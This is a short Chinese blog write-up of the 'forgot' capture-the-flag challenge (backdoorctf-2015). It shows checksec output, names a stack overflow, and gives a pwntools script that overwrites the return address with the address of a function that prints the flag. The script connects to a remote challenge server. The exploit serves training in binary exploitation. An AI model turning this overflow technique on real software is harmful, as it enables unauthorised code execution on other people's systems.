攻防世界 forgot wp (backdoorctf-2015

2019-08-02  本文已影响0人  111p1kk

checksec

kk@ubuntu:~/Desktop/black/GFSJ/forgot$ checksec forgot 
[*] '/home/kk/Desktop/black/GFSJ/forgot/forgot'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

ida
栈溢出


又找到了这个函数可以直接 cat flag

EXP如下

#!usr/bin/python

from pwn import *

io = remote("111.198.29.45", 54796)
# io = process("./forgot")
flag_addr = 0x080486CC

io.recv()
io.sendline("kk")

io.recv()
payload = "a" * 32 + "a" * 4 + p32(flag_addr)
io.sendline(payload)

io.interactive()
上一篇 下一篇

猜你喜欢

热点阅读